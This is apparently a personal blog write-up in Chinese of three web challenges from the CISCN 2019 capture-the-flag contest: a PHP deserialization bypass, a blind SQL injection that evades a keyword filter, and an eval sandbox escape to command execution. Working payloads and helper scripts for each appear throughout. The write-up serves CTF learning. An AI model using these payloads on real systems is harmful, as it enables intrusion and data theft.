N0rth3ty's Blog.

CISCN2019Web WP

字数统计: 2k阅读时长: 9 min
2019/04/23 Share

JustSoso

看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php  
// hint.php
class Handle{
private $handle;

public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}

public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}

class Flag{
public $file;
public $token;
public $token_flag;

function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
}

public function getFlag(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag) {
if(isset($this->file)) {
echo @highlight_file($this->file,true);
}
}
}
}
?>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// index.php

<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
$payload = unserialize($payload);
}else{
echo "Missing parameters";
}
?>

trick1 改成员属性数绕 __wakeup()
trick2 ///index.php 绕 parse_str
trick3 $flag->token = &$flag->token_flag; 引用,过===验证
最后poc

1
2
3
4
$F = new Flag('flag.php');
$F->token=&$F->token_flag;
$H = new Handle($F);
$test = serialize($H);

最终payload

1
///index.php?file=hint.php&payload=O:%2b6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:0:"";s:10:"token_flag";R:4;}}

全宇宙最简单的SQL

fuzz探测waf,有过滤这些字符

  • or
  • |
  • benchmark
  • sleep
  • if
  • get_lock
  • case

然后我们猜测他的后端SQL查询语句

1
"SELECT user FROM users WHERE `username`='".$_POST['username']."' AND `password`='".$_POST['password']."'"

由于这个地方过滤了orif,我们先猜测一波表名和列名

通过回显登陆失败还是数据库操作失败来判断表名/列名是否正确

这里直接时fuzz了表名为user,根据POST提交的参数猜测列名为usernamepassword

username验证成功了,但是password由于or的过滤无法猜测

同时,由于pow函数的溢出,我们可以通过构造的sql语句执行回显是登陆失败还是操作失败来判断数据位,也就是这里是一个报错盲注

没有写盲注脚本,我是用brup的intruder直接手跑出来的。username可以直接猜出来是admin,password列可以用子查询绕过

子查询是老大博客看的,tql
http://mitah.cn/index.php/archives/10/

payload如下(控制的参数用$符号标记出来了:
username=admin'+union+select+pow(2,$906$%2bascii(substr((select+fuck2+from+(select+1+as+fuck1,2+as+fuck2+from+user+where+1=0+union+select+*+from+user)x),$1$,1)))--+&password=asd

一位一位爆破完后,发现密码是F1AG@1s-at_/fll1llag_h3r3,(赛后补了脚本不帖了,登陆进去,可以发起新的数据库连接并操作。这个已经是玩烂的套路,直接跑脚本,需要获取的文件已经在密码里面写的很清楚了,然后直接拿到flag

image

脚本github: allyshka/Rogue-MySql-Server

love_math

这题出得很好(最后一百多解我是不信的
这题折腾了六个小时拿了一血,真爽
不出意外是我的最后一届国赛了吧,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
//帮你算出答案
eval('echo '.$content.';');
}

第一反应是想办法eval去命令执行
可以看到使用了黑白名单
大概是说字母数字只能用白名单中的,而符号的话黑名单中的都不能用
所以空格单双引号都是用不了的
第一想法是math中去找一个类似chr的函数来传入字符
可以找到一个16进制函数

1
2
dechex(15)
//返回一个字符串,包含有给定 binary_string 参数的十六进制表示。所能转换的最大数值为十进制的 4294967295,其结果为 "ffffffff"

但是16进制就只有a-f字母,虽然可以通过异或得到更多的
但是这明显还不是我们想要的,因为一个字母一个字母的构造明显是超长的
发现另一个函数

1
2
base_convert()
//返回一个字符串,包含 number 以 tobase 进制的表示。number 本身的进制由 frombase 指定。frombase 和 tobase 都只能在 2 和 36 之间(包括 2 和 36)。高于十进制的数字用字母 a-z 表示,例如 a 表示 10,b 表示 11 以及 z 表示 35

36进制就有a-z了,但是同样没有符号,不过符号可以通过异或去构造
这里只要思路正确其实很容易就能找到
就是去关注能返回字符串的math函数即可
然后就是要绕另一个点了,即绕过那个黑名单,因为我们已经可以直接调用system了
但是没有符号可以用,尤其是要去读flag.php,然后这个点会造成拼接,我们是传不进去点的

然后这里又要控制长度,我们与其去构造点不如去构造通配符
最短的命令应该是cat *
我们想想办法
我们需要异或一个空格+*出来
也可以用构造好的chr函数再去进行转换,但是这样就超长了
但是异或没有字符串
注意到php中函数名默认为字符串,可以进行异或
再配合dechex函数,就可以构造我们想要的值出来
写一个爆破脚本

1
2
3
4
5
6
7
8
9
10
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
$whitelist2 = [ 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh','abs'];

foreach ($whitelist as $i):
foreach ($whitelist2 as $k):
echo $k^$i^" *";
echo " " . $i . " " . $k;
echo "<br/>";
endforeach;
endforeach;

最终payload

1
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))

赛后看了wp发现还有很多的解法
一种和我们相似的是直接构造了nl f*这个命令
好吧我从来没听过这个命令

1
hex2bin(dechex(474260465194))

再然后就是利用$_GET[]
但是[]是不让用的,看了师傅们的payload

1
2
3
4
5
6
7
8
9
10
11
➜  Desktop php -a

php > echo base_convert('hex2bin',36,10);
37907361743
php > echo hexdec(bin2hex('_GET'));
1598506324

payload:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac flag.php
相当于:
$pi=_GET;($_GET[pi])($_GET[abs])

这里的一个trick就是用{}来代替[]
然后又看了福州大的payload
他们其实构造_GET失败了

1
2
// system($_GET);
$pi=base_convert(16191,10,36);$pi=$pi(95).$pi(71).$pi(69).$pi(84);base_convert(1751504350,10,36)($$pi{pi});

这显然是超长了
那就用header来传参

1
2
//system(getallheaders(){9})
$pi=base_convert;$pi(371235972282,10,28)(($pi(8768397090111664438,10,30))(){9})

确实蛮有意思的一道题目

最后国赛初赛总榜第二,在动车上做了一天的题目
web质量不错

CATALOG
  1. 1. JustSoso
  2. 2. 全宇宙最简单的SQL
  3. 3. love_math